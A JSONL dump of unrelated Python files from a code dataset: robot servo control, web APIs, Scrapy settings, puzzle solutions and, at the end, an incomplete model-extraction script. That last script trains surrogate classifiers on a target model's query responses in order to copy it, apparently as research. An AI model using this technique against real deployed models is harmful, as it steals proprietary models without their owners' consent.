test_tpot = TPOT_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test,\n total_time=params['total_time'],\n n_cores=params['n_cores'])\n\n results_tpot = test_tpot.sort_values(by=\"Cross-Validation accuracy\", ascending=False)\n results_tpot.to_csv(output_path + \"/tpot_results_\" + str(i) + \".csv\")\n\n # Test baseline\n test_baseline = baseline_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test)\n\n results_combined = {\"params\": params,\n \"results baseline\": test_baseline,\n # \"results randomized tpot\": results_randomized_tpot[0],\n \"results tpot\": results_tpot[0],\n \"results autosklearn\": results_autosklearn[0]}\n\n\n with open(output_path + \"/results_\" + str(i) + \".txt\", 'x') as file:\n file.write(json.dumps(results_combined))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"AutoML/AutoML_comparison.py","file_name":"AutoML_comparison.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381030894","text":"from lib.poker.card import Card\n\nclass Action(object):\n\n def __init__(self):\n pass\n\n # action = 0 是不要排\n @staticmethod\n def correct_action(play, action, action_history):\n correct = True\n card = ''\n last_action = 0\n if len(action_history) > 0:\n for item in list(reversed(action_history)):\n if item[1] > 0:\n last_action = item[1]\n break;\n\n if action > 0:\n card = Card.from_id(action)\n if card in play.cards:\n if len(action_history) > 0 and action < last_action:\n correct = False\n else:\n correct = False\n else:\n if len(action_history) == 0:\n # 开始不能为0\n correct = False\n else:\n # 检测用户手中是否有大于action_history中最后一个大于0的\n for c in play.cards:\n if Card.to_id(c) > last_action:\n correct = False\n break;\n\n\n # print('action check -->play cards:{} action:{} card:{} last action:{}'.format(play.cards,action, card, last_action))\n\n return correct\n\n # 选择该用户满足条件的动作列表\n @staticmethod\n def play_valid_actions(play, action_history):\n last_action = 0 if len(action_history) == 0 else action_history[-1][-1]\n actions = [Card.to_id(x) for x in play.cards if Card.to_id(x) > last_action]\n return actions","sub_path":"game/lib/poker_v1/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303001842","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n\r\ndef get_pair(arr, n):\r\n colors = {}\r\n pairs_count = 0\r\n for i in arr:\r\n if i in colors.keys():\r\n colors[i] += 1\r\n \r\n else:\r\n colors[i] = 1\r\n\r\n if colors[i] % 2 == 0:\r\n pairs_count += 1\r\n return pairs_count\r\n\r\nif __name__ == \"__main__\":\r\n n = input()\r\n arr = [] \r\n for i in input().split(): \r\n element = int(i) \r\n arr.append(element)\r\n\r\n print(get_pair(arr, n))","sub_path":"hacker_rank/sock_merchant.py","file_name":"sock_merchant.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"288155435","text":"#!/usr/bin/env python\nimport rospy\nimport time\n\nfrom servo import OnohatServo\nfrom opsoro_workbench.srv import EnablePcaPower\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Bool\nfrom std_msgs.msg import Float32\n\nclass FaceMotor(object):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\trospy.init_node(self.name)\n\t\tself.rate = rospy.Rate(10) # 10hz\n\t\tself.initPublishers()\n\t\tself.initSubscribers()\n\t\tself.initVariables()\n\n\tdef initPublishers(self):\n\t\tself.pubEyesBehavior = rospy.Publisher(\"/enableDefaultEyes\", Bool, queue_size = 10)\n\t\tself.pubLEye = rospy.Publisher(\"/moveLEye\", Point, queue_size = 10)\n\t\tself.pubREye = rospy.Publisher(\"/moveREye\", Point, queue_size = 10)\n\t\tself.pubSizePupils = rospy.Publisher(\"/size_pupils\", Float32, queue_size = 10)\n\n\tdef initSubscribers(self):\n\t\tself.subEmotions = rospy.Subscriber('/emotions', String, self.callbackEmotions)\n\t\tself.subStopTalk = rospy.Subscriber('/stopTalk', Bool, self.callbackStopTalk)\n\t\treturn\n\n\tdef initVariables(self):\n\t\tself.changeEmotions = False\n\t\tself.enableEyesBehavior = Bool()\n\t\tself.eyesPosition = Point()\n\t\tself.stopTalk = Bool()\n\t\tself.pupilSize = Float32()\n\t\tself.emotionsDict = {\n\t\t\"happy\": self.set_happy,\n\t\t\"sad\": self.set_sad,\n\t\t\"surprise\": self.set_surprise,\n\t\t\"angry\": self.set_angry,\n\t\t\"neutral\": self.set_neutral,\n\t\t\"demo\": self.demo,\n\t\t\"talk\": self.talk\n\t\t}\n\n\tdef set_servos(self):\n\t\t#mouth motors\n\t\tself.eyeledright = OnohatServo()\n\t\tself.eyeledleft = OnohatServo()\n\t\tself.mouth1 = OnohatServo()\n\t\tself.mouth2 = OnohatServo()\n\t\tself.mouth3 = OnohatServo()\n\n\t\t#eyeled\n\t\tself.eyeledright.set_motor_id(4)\n\t\tself.eyeledleft.set_motor_id(5)\n\t\tself.mouth1.set_motor_id(6)\n\t\tself.mouth2.set_motor_id(7)\n\t\tself.mouth3.set_motor_id(8)\n\n\t\t#set actuation ranges\n\t\tself.mouth1.set_actuation_range(min =1099, max = 1331, origin =1261)\n\t\tself.mouth2.set_actuation_range(min =799, max = 1301, origin =950)\n\t\tself.mouth3.set_actuation_range(min =899, max = 1501 , origin =1280)\n\t\tself.eyeledleft.set_actuation_range(min = 1199, max = 1851, origin =1450)\n\t\tself.eyeledright.set_actuation_range(min = 1049, max = 1651, origin =1420)\n\n\t\t#set origin position\n\t\tself.set_neutral()\n\n\tdef activate_mosfet(self, val):\n\t\trospy.wait_for_service('/onohat_controller/torque_enable')\n\t\tserviceTorque = rospy.ServiceProxy('/onohat_controller/torque_enable', EnablePcaPower)\n\t\ttry:\n\t\t\tserviceResponse = serviceTorque(val)\n\t\t\treturn serviceResponse.result\n\t\texcept rospy.ServiceException as exc:\n\t\t\trospy.logwarn(\"[%s] Service did not process request: \" + str(exc), self.name)\n\t\treturn\n\n\tdef eyes(self, x, y, pupilSize):\n\t\tself.enableEyesBehavior.data = False\n\t\tself.pubEyesBehavior.publish(self.enableEyesBehavior)\n\t\ttime.sleep(0.5)\n\t\tself.eyesPosition.x = x\n\t\tself.eyesPosition.y = y\n\t\tself.eyesPosition.z = 0\n\t\tself.pubLEye.publish(self.eyesPosition)\n\t\ttime.sleep(0.5)\n\t\tself.pupilSize.data = pupilSize\n\t\tself.pubSizePupils.publish(self.pupilSize)\n\t\tself.rate.sleep()\n\n\t#expressions\n\tdef set_happy(self):\n\t\tself.eyes(0, 8, 0.7)\n\t\tself.mouth1.set_position(command ={'value':1300})\n\t\tself.mouth2.set_position(command ={'value':1300})\n\t\tself.mouth3.set_position(command ={'value':900})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_sad(self):\n\t\tself.eyes(0, -20, 0.4)\n\t\tself.mouth1.set_position(command ={'value':1100})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_surprise(self):\n\t\tself.eyes(0, 15, 0.3)\n\t\tself.mouth1.set_position(command ={'value':1330})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_angry(self):\n\t\tself.eyes(0, 0, 0.5)\n\t\tself.mouth1.set_position(command ={'value':1255})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1800})\n\t\tself.eyeledright.set_position(command ={'value':1100})\n\n\tdef set_neutral(self):\n\t\tself.enableEyesBehavior.data = True\n\t\tself.pubEyesBehavior.publish(self.enableEyesBehavior)\n\t\tself.mouth1.set_origin_position()\n\t\tself.mouth2.set_origin_position()\n\t\tself.mouth3.set_origin_position()\n\t\tself.eyeledleft.set_origin_position()\n\t\tself.eyeledright.set_origin_position()\n\n\tdef talk(self):\n\t\tself.eyes(0, 8, 0.7)\n\t\tself.mouth2.set_position(command ={'value':950})\n\t\tself.mouth3.set_position(command ={'value':1300})\n\t\twhile not self.stopTalk:\n\t\t\tself.mouth1.set_position(command ={'value':1330})\n\t\t\ttime.sleep(0.2)\n\t\t\tself.mouth1.set_position(command ={'value':1300})\n\t\t\ttime.sleep(0.2)\n\n\tdef demo(self):\n\t\tprint(\"demo\")\n\t\ttime.sleep(2)\n\t\tself.set_happy()\n\t\ttime.sleep(2)\n\t\tself.set_sad()\n\t\ttime.sleep(2)\n\t\tself.set_angry()\n\t\ttime.sleep(2)\n\t\tself.set_surprise()\n\t\ttime.sleep(2)\n\t\tself.set_neutral()\n\t\ttime.sleep(2)\n\t\tself.talk()\n\n\tdef callbackEmotions(self, msg):\n\t\tself.emotion = msg.data\n\t\tself.changeEmotions = True\n\t\treturn\n\n\tdef callbackStopTalk(self, msg):\n\t\tself.stopTalk = msg.data\n\t\treturn\n\n\tdef main(self):\n\t\trospy.loginfo(\"[%s] Facemotor node started ok\", self.name)\n\t\tactive = self.activate_mosfet(True)\n\t\tif active:\n\t\t\twhile not (rospy.is_shutdown()):\n\t\t\t\tif self.changeEmotions:\n\t\t\t\t\tif self.emotion == \"talk\":\n\t\t\t\t\t\tself.stopTalk = False\n\t\t\t\t\tself.emotionsDict[self.emotion]()\n\t\t\t\t\tself.changeEmotions = False\n\t\t\tself.rate.sleep()\n\t\t#while not (rospy.is_shutdown()):\n\t\t#\tif self.changeEmotions:\n\t\t#\t\tself.emotionsDict[self.emotion]()\n\t\t#\t\tself.changeEmotions = False\n\t\t#\tself.rate.sleep()\n\t\treturn\n\n\nif __name__ == '__main__':\n\tfm = FaceMotor(\"motor_face_handler\")\n\tfm.set_servos()\n\tfm.main()\n","sub_path":"scripts/face_motor.py","file_name":"face_motor.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"453898896","text":"from rest_framework import generics, views, permissions, status, mixins\nfrom rest_framework.response import Response\nfrom .serializers import *\nfrom .models import *\n\n\n# Portfolio List API\nclass PortfolioListAPI(generics.ListAPIView):\n serializer_class = PortfolioSerializer\n queryset = Portfolio.objects.all()\n\n\n# Portfolio Manager API\nclass PortfolioManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = PortfolioSerializer\n queryset = Portfolio.objects.all()\n permission_classes = (permissions.IsAdminUser, )\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\n# Team List API\nclass TeamListAPI(generics.ListAPIView):\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n\n\n# Team Manager API\nclass TeamManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n permission_classes = (permissions.IsAdminUser, )\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\n# Post List API\nclass PostListAPI(generics.ListAPIView):\n serializer_class = PostSerializer\n queryset = Post.objects.all()\n\n\n# Post Manager API\nclass PostManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = PostSerializer\n queryset = Post.objects.all()\n permission_classes = (permissions.IsAdminUser, )\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n","sub_path":"niulunxi/homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307485644","text":"# File: d (Python 2.2)\n\nfrom pandac.PandaModules import *\nimport types\n\nclass Rope(NodePath):\n showRope = base.config.GetBool('show-rope', 1)\n \n def __init__(self, name = 'Rope'):\n self.ropeNode = RopeNode(name)\n self.curve = NurbsCurveEvaluator()\n self.ropeNode.setCurve(self.curve)\n NodePath.__init__(self, self.ropeNode)\n self.name = name\n\n \n def setup(self, order, verts, knots = None):\n self.order = order\n self.verts = verts\n self.knots = knots\n self.recompute()\n\n \n def recompute(self):\n if not (self.showRope):\n return None\n \n numVerts = len(self.verts)\n self.curve.reset(numVerts)\n self.curve.setOrder(self.order)\n for i in range(numVerts):\n (nodePath, point) = self.verts[i]\n if isinstance(point, types.TupleType):\n if len(point) >= 4:\n self.curve.setVertex(i, VBase4(point[0], point[1], point[2], point[3]))\n else:\n self.curve.setVertex(i, VBase3(point[0], point[1], point[2]))\n else:\n self.curve.setVertex(i, point)\n if nodePath:\n self.curve.setVertexSpace(i, nodePath)\n \n \n if self.knots != None:\n for i in range(len(self.knots)):\n self.curve.setKnot(i, self.knots[i])\n \n \n self.ropeNode.resetBound(self)\n\n \n def getPoints(self, len):\n result = self.curve.evaluate(self)\n numPts = len\n ropePts = []\n for i in range(numPts):\n pt = Point3()\n result.evalPoint(i / float(numPts - 1), pt)\n ropePts.append(pt)\n \n return ropePts\n\n\n","sub_path":"direct_notneeded/showutil/Rope.py","file_name":"Rope.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"625665819","text":"\nimport p_face_detect_train\n\nif __name__=='__main__':\n import sys\n try:\n train_data_fn=argv[1]\n train_result_fn=argv[2]\n\n except:\n train_data_fn='C:\\\\img_data\\\\MIT_face\\\\haar_featural\\\\'\n train_result_fn='C:\\\\img_data\\\\MIT_face\\\\train_inf\\\\'\n\n p_face_detect_train.train_all(train_data_fn,train_result_fn)\n\n \n","sub_path":"p_tem_face_detect.py","file_name":"p_tem_face_detect.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573454150","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for wish_crawler project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'wish_crawler'\n\nSPIDER_MODULES = ['wish_crawler.spiders']\nNEWSPIDER_MODULE = 'wish_crawler.spiders'\nLOG_LEVEL = 'INFO'\nFEED_EXPORT_ENCODING = 'utf-8'\nFEED_EXPORTERS = {\n 'csv': 'wish_crawler.spiders.csv_item_exporter.WishCsvItemExporter',\n}\n\nFIELDS_TO_EXPORT = [\n 'name',\n 'url',\n 'rating',\n 'rating_count',\n 'seller',\n 'seller_rating',\n 'img_1',\n 'img_2',\n 'img_3',\n 'img_4',\n 'img_5',\n 'img_6',\n 'img_7',\n 'img_8',\n 'img_9',\n 'id',\n 'total_inventory',\n 'num_bought',\n 'brand',\n 'description',\n 'v1_price',\n 'v1_price_discount',\n 'v1_min_fullfillment_time',\n 'v1_max_fullfillment_time',\n 'v1_inventory',\n 'v1_size',\n 'v1_color',\n 'v1_shipping_fee',\n 'v2_price',\n 'v2_price_discount',\n 'v2_min_fullfillment_time',\n 'v2_max_fullfillment_time',\n 'v2_inventory',\n 'v2_size',\n 'v2_color',\n 'v2_shipping_fee',\n 'v3_price',\n 'v3_price_discount',\n 'v3_min_fullfillment_time',\n 'v3_max_fullfillment_time',\n 'v3_inventory',\n 'v3_size',\n 'v3_color',\n 'v3_shipping_fee',\n 'v4_price',\n 'v4_price_discount',\n 'v4_min_fullfillment_time',\n 'v4_max_fullfillment_time',\n 'v4_inventory',\n 'v4_size',\n 'v4_color',\n 'v4_shipping_fee',\n 'v5_price',\n 'v5_price_discount',\n 'v5_min_fullfillment_time',\n 'v5_max_fullfillment_time',\n 'v5_inventory',\n 'v5_size',\n 'v5_color',\n 'v5_shipping_fee',\n 'v6_price',\n 'v6_price_discount',\n 'v6_min_fullfillment_time',\n 'v6_max_fullfillment_time',\n 'v6_inventory',\n 'v6_size',\n 'v6_color',\n 'v6_shipping_fee',\n\n 'v7_price',\n 'v7_price_discount',\n 'v7_min_fullfillment_time',\n 'v7_max_fullfillment_time',\n 'v7_inventory',\n 'v7_size',\n 'v7_color',\n 'v7_shipping_fee',\n\n 'v8_price',\n 'v8_price_discount',\n 'v8_min_fullfillment_time',\n 'v8_max_fullfillment_time',\n 'v8_inventory',\n 'v8_size',\n 'v8_color',\n 'v8_shipping_fee',\n\n 'v9_price',\n 'v9_price_discount',\n 'v9_min_fullfillment_time',\n 'v9_max_fullfillment_time',\n 'v9_inventory',\n 'v9_size',\n 'v9_color',\n 'v9_shipping_fee',\n\n 'v10_price',\n 'v10_price_discount',\n 'v10_min_fullfillment_time',\n 'v10_max_fullfillment_time',\n 'v10_inventory',\n 'v10_size',\n 'v10_color',\n 'v10_shipping_fee',\n\n 'v11_price',\n 'v11_price_discount',\n 'v11_min_fullfillment_time',\n 'v11_max_fullfillment_time',\n 'v11_inventory',\n 'v11_size',\n 'v11_color',\n 'v11_shipping_fee',\n\n 'v12_price',\n 'v12_price_discount',\n 'v12_min_fullfillment_time',\n 'v12_max_fullfillment_time',\n 'v12_inventory',\n 'v12_size',\n 'v12_color',\n 'v12_shipping_fee',\n\n 'v13_price',\n 'v13_price_discount',\n 'v13_min_fullfillment_time',\n 'v13_max_fullfillment_time',\n 'v13_inventory',\n 'v13_size',\n 'v13_color',\n 'v13_shipping_fee',\n\n 'v14_price',\n 'v14_price_discount',\n 'v14_min_fullfillment_time',\n 'v14_max_fullfillment_time',\n 'v14_inventory',\n 'v14_size',\n 'v14_color',\n 'v14_shipping_fee',\n\n 'v15_price',\n 'v15_price_discount',\n 'v15_min_fullfillment_time',\n 'v15_max_fullfillment_time',\n 'v15_inventory',\n 'v15_size',\n 'v15_color',\n 'v15_shipping_fee'\n]\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'wish_crawler (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = True\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n#DOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN = 16\n#CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n#COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'wish_crawler.middlewares.WishCrawlerSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'wish_crawler.middlewares.MyCustomDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\n#ITEM_PIPELINES = {\n# 'wish_crawler.pipelines.WishCrawlerPipeline': 300,\n#}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\n#HTTPCACHE_DIR = 'httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES = []\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n","sub_path":"wish_crawler/wish_crawler/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"654157209","text":"# Problem: http://www.usaco.org/index.php?page=viewproblem2&cpid=737\n# IDK how to solve because I'm bad.\nimport sys\n\n\nsys.stdin = open(\"art.in\", 'r')\nsys.stdout = open('art.out', 'w')\n\nwl = int(input())\n\npainting = []\nfor i in range(wl-1):\n painting.append(list(map(int, input().split())))\n\n\n\nprint(...)\n","sub_path":"USACO Problems/Bronze/2017/open/Problem 3/modern_art.py","file_name":"modern_art.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64061329","text":"import logging\nimport piradio.commons as commons\nfrom . import base\n\n\nclass ClockService(base.AsyncService):\n TIME_CHANGED_EVENT = 'time_changed'\n\n def __init__(self):\n super(ClockService, self).__init__(tick_interval=1.0)\n self.prev_timeofday = commons.timeofday()\n\n def timeofday(self):\n return self.prev_timeofday\n\n def tick(self):\n super(ClockService, self).tick()\n timeofday = commons.timeofday()\n if timeofday != self.prev_timeofday:\n logging.debug('ClockService: time changed to %s', timeofday)\n self.prev_timeofday = timeofday\n self.notify_subscribers(self.TIME_CHANGED_EVENT, timeofday)\n","sub_path":"piradio/services/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"526587483","text":"#!/usr/bin/python3\nimport pandas as pd\nimport numpy as np\nimport sys, random\nfrom copy import deepcopy\nfrom decimal import Decimal\n\n\n\"\"\"\nUsage: python sequence.py \n\"\"\"\n\n\nclass SeqSample(object):\n\n def __init__(self, path):\n self.df = pd.read_csv(path)\n self.current = list(self.df.columns[1:-1])\n random.shuffle(self.current)\n\n\n def neighbor_move(self, num_moves=2):\n proposed = deepcopy(self.current)\n for i in range(0, num_moves):\n idx = range(len(self.current))\n i1, i2 = random.sample(idx, 2)\n proposed[i1], proposed[i2] = proposed[i2], proposed[i1]\n\n return proposed\n\n\n def score_sequence(self, sequence):\n score = 0\n idx = 0\n current = 'start'\n for song in sequence:\n nxt = sequence[idx]\n songscore = float(self.df[self.df['name']==nxt][current])\n score += songscore\n current = nxt\n idx += 1\n\n endscore = float(self.df[self.df['name']=='stop'][current])\n score += endscore\n\n return score\n\n\n def target(self, x):\n return np.exp(Decimal(x) / Decimal(self.temp))\n\n\n def accept(self, oldseq, newseq, t=1):\n old = self.score_sequence(oldseq)\n new = self.score_sequence(newseq)\n A = min(1, self.target(new - old))\n return random.uniform(0, 1) < A\n\n \n def main_loop(self, inner_i=100,\n start_moves=4, end_moves=1):\n temp_schedule = [20, 15, 10, 7, 5, 10, 5, 1, 5, 0.5, 0.1, 3, 1,\n 0.1, 0.05]\n outer_i = len(temp_schedule)\n\n moves_increment = (start_moves - end_moves) / (outer_i - 1)\n moves = start_moves\n print('Initial num. moves: {}'.format(moves))\n for temp in temp_schedule:\n self.temp = temp\n print('Current temp: {}'.format(self.temp))\n print('Number of neighbor moves: {}'.format(round(moves)))\n accepted = 0\n for j in range(0, inner_i):\n self.proposed = self.neighbor_move(num_moves=round(moves))\n if self.accept(self.current, self.proposed):\n accepted += 1\n self.current = self.proposed\n print('Acceptance rate this round: {}'.format(\n accepted / inner_i\n ))\n moves -= moves_increment\n print('Current sequence:')\n print(self.current)\n print('Current score: {}'.format(self.score_sequence(self.current)))\n print('-----------------------------------------')\n\n print('FINAL SEQUENCE:')\n print(self.current)\n\n\ndef main():\n sampler = SeqSample(sys.argv[1])\n sampler.main_loop()\n\nif __name__=='__main__':\n main()\n","sub_path":"sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"632567156","text":"import time\r\nfrom collections import Counter\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nfrom iris.Stealer import Stealer\r\nfrom iris.Target import Target\r\nimport pandas as pd\r\nimport random\r\nimport numpy as np\r\nfrom sklearn.datasets import fetch_20newsgroups\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics import accuracy_score\r\nimport scipy.sparse as scip\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nstep = 200\r\nerr_set_num = 70\r\nrgt_set_num = 70\r\n\r\ndef samples(data):\r\n # get 50 samples as random samples\r\n return random.sample(data, 50)\r\n\r\n# generate h0 and err_set, rgt_set\r\ndef prepare(target, stealer):\r\n #h0_train = stealer.pool[0:stealer.pool.shape[0]-1]\r\n h0_train = stealer.data[stealer.row : stealer.row + step]\r\n stealer.row = step\r\n target_pred_train = target.model.predict(h0_train)\r\n stealer.queries += step\r\n\r\n # train h0 by a small random dataset\r\n #h0_vectors = target.vectorizer.transform(h0_train)\r\n h0 = stealer.train_base_clf(h0_train, target_pred_train)\r\n stealer.models.append(h0)\r\n\r\n # test on training set and testing set\r\n h0_test = stealer.data[stealer.row : step + stealer.row]\r\n stealer.row += step\r\n h0_test = h0_test.reset_index(drop=True) # \"=\"\r\n target_pred_test = target.model.predict(h0_test)\r\n h0_pred = h0.predict(h0_test)\r\n print(\"testing on h0\", accuracy_score(target_pred_test, h0_pred))\r\n print(\"training on h0\", accuracy_score(target_pred_train, h0.predict(h0_train)))\r\n\r\n cols_name = target.test.columns.tolist()\r\n cols_name.append('target')\r\n stealer.cols_name = cols_name\r\n err_sample = pd.DataFrame(columns=cols_name)\r\n rgt_sample = pd.DataFrame(columns=cols_name)\r\n\r\n # pick error samples from pool as error_set0\r\n for i in range(len(target_pred_test)):\r\n if target_pred_test[i] != h0_pred[i]:\r\n x = h0_test.iloc[i].tolist()\r\n x.append(target_pred_test[i])\r\n err_sample.loc[len(err_sample)] = x\r\n else:\r\n x = h0_test.iloc[i].tolist()\r\n x.append(target_pred_test[i])\r\n rgt_sample.loc[len(rgt_sample)] = x\r\n #rgt_sample.append(h0_test.iloc[i].tolist().append(target_pred_test[i]))\r\n return err_sample, rgt_sample\r\n\r\n\r\ndef form_err_rgt_set(target, stealer, rd):\r\n add_new = 200\r\n test = stealer.data[stealer.row : stealer.row + add_new]\r\n test = test.reset_index(drop=True)\r\n stealer.row += add_new #update row\r\n # pick 300 err samples from file rd-1, rd-2 and rd-3\r\n #if rd >= 3:\r\n j = rd - 1\r\n while j >= (rd - 3) and j >= 0:\r\n # err set\r\n err_data = pd.read_csv(\"err_set/err_set{}.csv\".format(j))\r\n if len(err_data)>=err_set_num:\r\n err_data = err_data.sample(err_set_num)\r\n\r\n # rgt set\r\n rgt_data = pd.read_csv(\"rgt_set/rgt_set{}.csv\".format(j))\r\n if len(rgt_data)>= rgt_set_num:\r\n rgt_data = rgt_data.sample(rgt_set_num)\r\n\r\n j -= 1\r\n\r\n return err_data, rgt_data\r\n\r\n\r\ndef merge(err_set):\r\n chars = err_set[0].shape[1]\r\n row = len(err_set)\r\n dd1 = err_set[0]\r\n i = 1\r\n while i < len(err_set):\r\n if i == 1:\r\n dd = err_set[i]\r\n dd = scip.vstack(dd1, dd)\r\n else:\r\n dd1 = err_set[i]\r\n dd = scip.vstack(dd, dd1)\r\n i += 1\r\n return dd\r\n\r\ndef store(err_sample, rgt_sample, rd):\r\n err_sample.to_csv(\"err_set/err_set{}.csv\".format(rd), index=False)\r\n rgt_sample.to_csv(\"rgt_set/rgt_set{}.csv\".format(rd), index=False)\r\n\r\n\r\ndef show_pic(rd, accuracy):\r\n plt.xlabel('round')\r\n plt.ylabel('accuracy')\r\n plt.title('model stealing')\r\n plt.plot(rd, accuracy, \"b--\", linewidth=1)\r\n plt.show()\r\n time.sleep(3)\r\n plt.close()\r\n\r\ndef test_accu(stealer, target):\r\n pred = stealer.forest_predict(target.test, rows=len(target.test))\r\n print(pred)\r\n target_pred = target.model.predict(target.test)\r\n return accuracy_score(target_pred, pred), accuracy_score(target.test_lb, pred)\r\n\r\ndef update_clf(err_set, tar_lb, add_random, target, clf):\r\n add_random = add_random.tolist()\r\n lb = target.model.predict(target.vectorizer.transform(add_random)).tolist()\r\n err_set = err_set + add_random\r\n tar_lb = tar_lb + lb\r\n #clf = DecisionTreeClassifier(criterion='entropy', max_depth=10, random_state=60)\r\n clf.fit(target.vectorizer.transform(err_set), tar_lb)\r\n return clf\r\n\r\n\r\nif __name__ == '__main__':\r\n tar_type = \"XGB\"\r\n pro = 25\r\n print(\"type:{}, pro:{}, step:{}, errnum:{}, aux_num:{}\".\r\n format(tar_type, pro, step, err_set_num, rgt_set_num))\r\n target = Target(tar_type)\r\n stealer = Stealer(target, pro)\r\n # train tree0 and err_set\r\n err_sample, rgt_sample = prepare(target, stealer) #return 